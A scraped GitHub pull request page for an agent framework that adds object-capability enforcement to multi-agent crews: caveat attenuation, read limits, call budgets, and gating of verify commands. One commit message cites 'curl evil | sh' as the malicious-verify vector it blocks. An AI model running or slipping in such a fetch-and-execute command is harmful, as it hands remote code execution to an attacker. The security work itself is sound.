feat(ocap): crew_runner applies caveats.meet() at dispatch + honest docstrings (#750) by hartsock · Pull Request #751 · Gilamonster-Foundation/newt-agent

hartsock · 2026-06-29T15:18:03Z

OCAP enforcement-floor stack — PR 2 of 8 · epic #749

Review/merge order (full ordered list + rationale in #749): a docs PR (docs/ocap-authority-review, the design review + paper — opens at the end of the stack) is the "read-first" rationale; this is step 2; step 3 (crew fs_read) branches off this. Merge bottom-up.

What this does

Wires the .meet() attenuation seam: LocalCrewRunner::dispatch now passes child = session.meet(crew_clamp) (pure dispatch_caveats helper) to run_team/run_crew instead of the session caveats unmodified. crew_clamp is config-sourced ([crew], default Caveats::top() ⇒ meet is identity ⇒ today's behavior unchanged) and is the tightening point for the per-subtask team_clamp (#749 step 8). The crew_tool.rs docstrings now claim only what meet guarantees (≤ session), replacing the false "never the session's full grant."

Test plan

dispatch_caveats_meets_the_clamp_and_stays_le_session — red on today's code (a crew with a net-denying clamp still permitted net), green after; + default-is-top identity + the config wiring. just check green (2663 tests). The agent-mesh meet algebra is sound + unchanged.

Fixes #750. Part of #749. Refs #739, #741.

🤖 Generated with Claude Code

…ocstrings (#750) OCAP enforcement-floor stack (#749, PR 2/8). Wires the .meet() attenuation seam: LocalCrewRunner::dispatch now computes child_caveats = session.meet(crew_clamp) via a pure dispatch_caveats helper and passes it to run_team/run_crew, instead of the session caveats unmodified. crew_clamp is config-sourced ([crew] CrewPolicyConfig, default Caveats::top() so today's behavior is unchanged — meet is identity by default) and is the tightening point for the per-subtask team_clamp (#749 step 8). The crew_tool.rs docstrings now claim only what meet guarantees (<= session), replacing the false "never the session's full grant." TDD: dispatch_caveats_meets_the_clamp_and_stays_le_session (red on today's code — a crew with a net-denying clamp still permitted net; green after) + default-is-top identity + the config wiring. just check green (2663 tests). The agent-mesh meet algebra is sound + unchanged. Fixes #750. Part of #749. Refs #739, #741. Co-authored-by: Claude Opus 4.8 (1M context) <noreply@anthropic.com>

…lls, team-verify, clamp grammar (#749) (#781) * feat(ocap): crew.rs enforces fs_read — complete mediation for reads (#752) OCAP enforcement-floor stack (#749, PR 3/8; stacked on #751). The crew CURATE stage read navigator-selected files unconditionally — a clamped fs_read caveat was ignored. Now the navigator's relevant_files are partitioned through caveats.permits_fs_read(path) (mirroring the permits_fs_write partition at crew.rs:348): only readable files are read; denied files are never passed to workspace.read and are surfaced honestly ("N file(s) not readable under your fs_read caveat: ..."), so a clamped read fails visibly. TDD: refuses_to_read_outside_the_fs_read_leash — fs_read=Only([file]); the out-of-scope file is not read, the in-scope one is (red on today's code — both read; green after). just check green (52 newt-scheduler tests, +1). Note: permits_fs_read is exact-string membership (no path-prefix/glob); a prefix-aware fs_read scope is a separate algebra refinement (follow-up). This PR wires the existing predicate. Fixes #752. Part of #749. Refs #739, #741. Co-authored-by: Claude Opus 4.8 (1M context) <noreply@anthropic.com> * feat(ocap): crew enforces max_calls — complete mediation for the call budget (#753) OCAP enforcement-floor stack (#749, PR 4/8; stacked on #759). The crew loop bounded work only by cfg.max_attempts, ignoring caveats.max_calls. Now a calls_used counter consults caveats.max_calls.permits_one_more(used) before each model dispatch (navigate/plan/triage); when the budget denies, the crew stops with an honest NeedsHumanReview cap-exit (never reported as success). The call unit is the model/role dispatch — matching newt-coder's existing call budget. max_calls is now an INDEPENDENT ceiling alongside max_attempts; CountBound::Unlimited (the Caveats::top default) leaves unclamped crews unchanged. net: documented in-code — the crew loop has no direct net effect a permits_net check could gate; net is governed transitively via the exec axis (commands) + an OS sandbox, not a crew-loop predicate (per-axis complete mediation: this axis needs a sandbox, not a call-site). TDD: max_calls_caveat_bounds_total_model_calls (red on today's code — 21 dispatches with max_calls=AtMost(3); green after — 3) + max_calls_zero_denies_even_the_navigator (red — 11; green — 0). RED verified by neutralizing the gates. just check green. Fixes #753. Part of #749. Refs #739, #741. Co-authored-by: Claude Opus 4.8 (1M context) <noreply@anthropic.com> * feat(ocap): gate the team-mode per-subtask verify through the exec axis (#754) OCAP enforcement-floor stack (#749, PR 5/8; stacked on #760). The lead-authored per-subtask verify (team.rs run_team) was installed as the test command with NO exec check — a malicious verify (curl evil | sh) ran ungated (the T2 verify-as-payload vector, design review §3.3). Now caveats.permits_exec(verify) gates it before set_test_command: a denied verify is refused-not-run (not installed; the workspace default check stands; an honest note surfaces it). permits_exec is the same predicate used for the top-level (crew_runner) + plan-leaf (plan_exec) verifies. TDD: denied_per_subtask_verify_is_refused_not_installed — exec=Only([check-a]); verify check-b is NOT installed, check-a is (red on today's code — both installed; green after). RED verified by revert. just check green (6 team tests). Fixes #754. Part of #749. Refs #739, #741. Co-authored-by: Claude Opus 4.8 (1M context) <noreply@anthropic.com> * feat(ocap): NamedPermissionPreset can clamp fs_read — clamp-grammar fix (#755) OCAP enforcement-floor stack (#749, PR 6/8; stacked on #765). The M6 grammar gap: a preset could not narrow fs_read (to_caveat_profile hardcoded ScopeSpec::default()=All), even though CaveatProfile/Caveats can. NamedPermissionPreset now has an optional fs_read: Option<ScopeSpec> (serde default None => All, so every existing preset is byte-for-byte unchanged); to_caveat_profile lowers it (Some narrows reads). A preset CAN now narrow fs_read when specified. Deferred (documented in-code): valid_for_generation (a causal-window axis, not a preset clamp — follow-up); the default-deny for un-annotated subtasks (an empty clamp is correctly meet-identity; default-deny belongs in step 8's subtask-clamp derivation, not role_profile's general default — flipping it would break back-compat for every preset consumer). TDD: fs_read_clamp_narrows_reads (red on today — fs_read always All; green after) + back-compat (omitted fs_read => All) + config-parse. RED verified by revert. just check green. Mechanical: adding the field required `fs_read: None` in 2 exhaustive struct literals (newt-tui test fixtures); behavior-preserving (consumer literals use ..default()). Fixes #755. Part of #749. Refs #739, #741. Co-authored-by: Claude Opus 4.8 (1M context) <noreply@anthropic.com> --------- Co-authored-by: Shawn Hartsock <hartsock@users.noreply.github.com> Co-authored-by: Claude Opus 4.8 (1M context) <noreply@anthropic.com>

hartsock added the ocap Object-capability / authority-security; pending full design review label Jun 29, 2026

hartsock merged commit 6ead94d into main Jun 29, 2026
16 checks passed

hartsock deleted the feat/ocap-2-crew-meet-seam branch June 29, 2026 23:06

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Uh oh!

feat(ocap): crew_runner applies caveats.meet() at dispatch + honest docstrings (#750)#751

feat(ocap): crew_runner applies caveats.meet() at dispatch + honest docstrings (#750)#751
hartsock merged 1 commit into
mainfrom
feat/ocap-2-crew-meet-seam

hartsock commented Jun 29, 2026

Uh oh!

Uh oh!

Reviewers

Assignees

Labels

Projects

Milestone

Development

Uh oh!

1 participant

Uh oh!

Conversation

hartsock commented Jun 29, 2026

OCAP enforcement-floor stack — PR 2 of 8 · epic #749

What this does

Test plan

Uh oh!

Uh oh!

Reviewers

Assignees

Labels

Projects

Milestone

Development

Uh oh!

1 participant